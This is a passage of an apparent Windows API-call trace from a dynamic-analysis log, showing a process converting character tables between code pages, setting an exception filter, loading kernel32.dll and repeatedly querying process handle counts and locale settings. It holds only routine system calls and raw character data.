!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ蒨욥ᨤJĀ", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0069.834] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÂE=<\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0069.834] GetLastError () returned 0x0 [0069.834] SetLastError (dwErrCode=0x0) [0069.834] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0069.835] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ蒨욥ᨤJĀ") returned 256 [0069.835] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ蒨욥ᨤJĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0069.835] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ蒨욥ᨤJĀ", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0069.835] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÂE=<\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0069.835] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49e57b) returned 0x0 [0069.835] RtlSizeHeap (HeapHandle=0x3f80000, Flags=0x0, MemoryPointer=0x3f82b20) returned 0x80 [0069.835] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x752b0000 [0069.835] GetCurrentProcess () returned 0xffffffff [0069.836] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.836] GetSystemDefaultLangID () returned 0x2730409 [0069.836] GetThreadLocale () returned 0x409 [0069.836] GetCurrentProcess () returned 0xffffffff [0069.836] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.836] GetSystemDefaultLangID () returned 0x2730409 [0069.836] GetThreadLocale () returned 0x409 [0069.836] GetCurrentProcess () returned 0xffffffff [0069.836] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.836] GetSystemDefaultLangID () returned 0x2730409 [0069.836] GetThreadLocale () returned 0x409 [0069.836] GetCurrentProcess () returned 0xffffffff [0069.836] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.836] GetSystemDefaultLangID () returned 0x2730409 [0069.836] GetThreadLocale () returned 0x409 [0069.836] GetCurrentProcess () returned 0xffffffff [0069.836] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.837] GetSystemDefaultLangID () returned 0x2730409 [0069.837] GetThreadLocale () returned 0x409 [0069.837] GetCurrentProcess () returned 0xffffffff [0069.837] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.837] GetSystemDefaultLangID () returned 0x2730409 [0069.837] GetThreadLocale () returned 0x409 [0069.837] GetCurrentProcess () returned 0xffffffff [0069.837] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.837] GetSystemDefaultLangID () returned 0x2730409 [0069.837] GetThreadLocale () returned 0x409 [0069.837] GetCurrentProcess () returned 0xffffffff [0069.837] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.837] GetSystemDefaultLangID () returned 0x2730409 [0069.837] GetThreadLocale () returned 0x409 [0069.837] GetCurrentProcess () returned 0xffffffff [0069.837] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.837] GetSystemDefaultLangID () returned 0x2730409 [0069.837] GetThreadLocale () returned 0x409 [0069.837] GetCurrentProcess () returned 0xffffffff [0069.837] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.837] GetSystemDefaultLangID () returned 0x2730409 [0069.837] GetThreadLocale () returned 0x409 [0069.837] GetCurrentProcess () returned 0xffffffff [0069.837] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.837] GetSystemDefaultLangID () returned 0x2730409 [0069.837] GetThreadLocale () returned 0x409 [0069.837] GetCurrentProcess () returned 0xffffffff [0069.837] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.837] GetSystemDefaultLangID () returned 0x2730409 [0069.837] GetThreadLocale () returned 0x409 [0069.837] GetCurrentProcess () returned 0xffffffff [0069.838] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.838] GetSystemDefaultLangID () returned 0x2730409 [0069.838] GetThreadLocale () returned 0x409 [0069.838] GetCurrentProcess () returned 0xffffffff [0069.838] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.838] GetSystemDefaultLangID () returned 0x2730409 [0069.838] GetThreadLocale () returned 0x409 [0069.838] GetCurrentProcess () returned 0xffffffff [0069.838] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.838] GetSystemDefaultLangID () returned 0x2730409 [0069.838] GetThreadLocale () returned 0x409 [0069.838] GetCurrentProcess () returned 0xffffffff [0069.838] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.838] GetSystemDefaultLangID () returned 0x2730409 [0069.838] GetThreadLocale () returned 0x409 [0069.838] GetCurrentProcess () returned 0xffffffff [0069.838] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.838] GetSystemDefaultLangID () returned 0x2730409 [0069.838] GetThreadLocale () returned 0x409 [0069.838] GetCurrentProcess () returned 0xffffffff [0069.838] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.838] GetSystemDefaultLangID () returned 0x2730409 [0069.838] GetThreadLocale () returned 0x409 [0069.838] GetCurrentProcess () returned 0xffffffff [0069.838] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.838] GetSystemDefaultLangID () returned 0x2730409 [0069.838] GetThreadLocale () returned 0x409 [0069.838] GetCurrentProcess () returned 0xffffffff [0069.838] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.839] GetSystemDefaultLangID () returned 0x2730409 [0069.839] GetThreadLocale () returned 0x409 [0069.839] GetCurrentProcess () returned 0xffffffff [0069.839] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.839] GetSystemDefaultLangID () returned 0x2730409 [0069.839] GetThreadLocale () returned 0x409 [0069.839] GetCurrentProcess () returned 0xffffffff [0069.839] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.839] GetSystemDefaultLangID () returned 0x2730409 [0069.839] GetThreadLocale () returned 0x409 [0069.839] GetCurrentProcess () returned 0xffffffff [0069.839] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.839] GetSystemDefaultLangID () returned 0x2730409 [0069.839] GetThreadLocale () returned 0x409 [0069.839] GetCurrentProcess () returned 0xffffffff [0069.839] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.839] GetSystemDefaultLangID () returned 0x2730409 [0069.839] GetThreadLocale () returned 0x409 [0069.839] GetCurrentProcess () returned 0xffffffff [0069.839] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.839] GetSystemDefaultLangID () returned 0x2730409 [0069.839] GetThreadLocale () returned 0x409 [0069.839] GetCurrentProcess () returned 0xffffffff [0069.839] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.839] GetSystemDefaultLangID () returned 0x2730409 [0069.839] GetThreadLocale () returned 0x409 [0069.839] GetCurrentProcess () returned 0xffffffff [0069.839] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.839] GetSystemDefaultLangID () returned 0x2730409 [0069.839] GetThreadLocale () returned 0x409 [0069.839] GetCurrentProcess () returned 0xffffffff [0069.839] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.840] GetSystemDefaultLangID () returned 0x2730409 [0069.840] GetThreadLocale () returned 0x409 [0069.840] GetCurrentProcess () returned 0xffffffff [0069.840] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.840] GetSystemDefaultLangID () returned 0x2730409 [0069.840] GetThreadLocale () returned 0x409 [0069.840] GetCurrentProcess () returned 0xffffffff [0069.840] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.840] GetSystemDefaultLangID () returned 0x2730409 [0069.840] GetThreadLocale () returned 0x409 [0069.840] GetCurrentProcess () returned 0xffffffff [0069.840] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.840] GetSystemDefaultLangID () returned 0x2730409 [0069.840] GetThreadLocale () returned 0x409 [0069.840] GetCurrentProcess () returned 0xffffffff [0069.840] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.840] GetSystemDefaultLangID () returned 0x2730409 [0069.840] GetThreadLocale () returned 0x409 [0069.840] GetCurrentProcess () returned 0xffffffff [0069.840] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.840] GetSystemDefaultLangID () returned 0x2730409 [0069.840] GetThreadLocale () returned 0x409 [0069.840] GetCurrentProcess () returned 0xffffffff [0069.840] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.840] GetSystemDefaultLangID () returned 0x2730409 [0069.840] GetThreadLocale () returned 0x409 [0069.840] GetCurrentProcess () returned 0xffffffff [0069.840] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.840] GetSystemDefaultLangID () returned 0x2730409 [0069.840] GetThreadLocale () returned 0x409 [0069.840] GetCurrentProcess () returned 0xffffffff [0069.840] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.841] GetSystemDefaultLangID () returned 0x2730409 [0069.841] GetThreadLocale () returned 0x409 [0069.841] GetCurrentProcess () returned 0xffffffff [0069.841] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.841] GetSystemDefaultLangID () returned 0x2730409 [0069.841] GetThreadLocale () returned 0x409 [0069.841] GetCurrentProcess () returned 0xffffffff [0069.841] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.841] GetSystemDefaultLangID () returned 0x2730409 [0069.841] GetThreadLocale () returned 0x409 [0069.841] GetCurrentProcess () returned 0xffffffff [0069.841] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.841] GetSystemDefaultLangID () returned 0x2730409 [0069.841] GetThreadLocale () returned 0x409 [0069.841] GetCurrentProcess () returned 0xffffffff [0069.841] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.841] GetSystemDefaultLangID () returned 0x2730409 [0069.841] GetThreadLocale () returned 0x409 [0069.841] GetCurrentProcess () returned 0xffffffff [0069.841] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.841] GetSystemDefaultLangID () returned 0x2730409 [0069.841] GetThreadLocale () returned 0x409 [0069.841] GetCurrentProcess () returned 0xffffffff [0069.841] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.841] GetSystemDefaultLangID () returned 0x2730409 [0069.841] GetThreadLocale () returned 0x409 [0069.841] GetCurrentProcess () returned 0xffffffff [0069.841] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.841] GetSystemDefaultLangID () returned 0x2730409 [0069.841] GetThreadLocale () returned 0x409 [0069.841] GetCurrentProcess () returned 0xffffffff [0069.841] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.842] GetSystemDefaultLangID () returned 0x2730409 [0069.842] GetThreadLocale () returned 0x409 [0069.842] GetCurrentProcess () returned 0xffffffff [0069.842] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.842] GetSystemDefaultLangID () returned 0x2730409 [0069.842] GetThreadLocale () returned 0x409 [0069.842] GetCurrentProcess () returned 0xffffffff [0069.842] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.842] GetSystemDefaultLangID () returned 0x2730409 [0069.842] GetThreadLocale () returned 0x409 [0069.842] GetCurrentProcess () returned 0xffffffff [0069.842] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.842] GetSystemDefaultLangID () returned 0x2730409 [0069.842] GetThreadLocale () returned 0x409 [0069.842] GetCurrentProcess () returned 0xffffffff [0069.842] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.842] GetSystemDefaultLangID () returned 0x2730409 [0069.842] GetThreadLocale () returned 0x409 [0069.842] GetCurrentProcess () returned 0xffffffff [0069.842] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.842] GetSystemDefaultLangID () returned 0x2730409 [0069.842] GetThreadLocale () returned 0x409 [0069.842] GetCurrentProcess () returned 0xffffffff [0069.842] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.842] GetSystemDefaultLangID () returned 0x2730409 [0069.842] GetThreadLocale () returned 0x409 [0069.842] GetCurrentProcess () returned 0xffffffff [0069.842] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.842] GetSystemDefaultLangID () returned 0x2730409 [0069.842] GetThreadLocale () returned 0x409 [0069.842] GetCurrentProcess () returned 0xffffffff [0069.843] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.843] GetSystemDefaultLangID () returned 0x2730409 [0069.843] GetThreadLocale () returned 0x409 [0069.843] GetCurrentProcess () returned 0xffffffff [0069.843] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.843] GetSystemDefaultLangID () returned 0x2730409 [0069.843] GetThreadLocale () returned 0x409 [0069.843] GetCurrentProcess () returned 0xffffffff [0069.843] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.843] GetSystemDefaultLangID () returned 0x2730409 [0069.843] GetThreadLocale () returned 0x409 [0069.843] GetCurrentProcess () returned 0xffffffff [0069.843] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.843] GetSystemDefaultLangID () returned 0x2730409 [0069.843] GetThreadLocale () returned 0x409 [0069.843] GetCurrentProcess () returned 0xffffffff [0069.843] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.843] GetSystemDefaultLangID () returned 0x2730409 [0069.843] GetThreadLocale () returned 0x409 [0069.843] GetCurrentProcess () returned 0xffffffff [0069.843] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.843] GetSystemDefaultLangID () returned 0x2730409 [0069.843] GetThreadLocale () returned 0x409 [0069.843] GetCurrentProcess () returned 0xffffffff [0069.843] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.843] GetSystemDefaultLangID () returned 0x2730409 [0069.843] GetThreadLocale () returned 0x409 [0069.843] GetCurrentProcess () returned 0xffffffff [0069.843] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.844] GetSystemDefaultLangID () returned 0x2730409 [0069.844] GetThreadLocale () returned 0x409 [0069.844] GetCurrentProcess () returned 0xffffffff [0069.844] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.844] GetSystemDefaultLangID () returned 0x2730409 [0069.844] GetThreadLocale () returned 0x409 [0069.844] GetCurrentProcess () returned 0xffffffff [0069.844] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.844] GetSystemDefaultLangID () returned 0x2730409 [0069.844] GetThreadLocale () returned 0x409 [0069.844] GetCurrentProcess () returned 0xffffffff [0069.844] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.844] GetSystemDefaultLangID () returned 0x2730409 [0069.844] GetThreadLocale () returned 0x409 [0069.844] GetCurrentProcess () returned 0xffffffff [0069.844] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.844] GetSystemDefaultLangID () returned 0x2730409 [0069.844] GetThreadLocale () returned 0x409 [0069.844] GetCurrentProcess () returned 0xffffffff [0069.844] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.844] 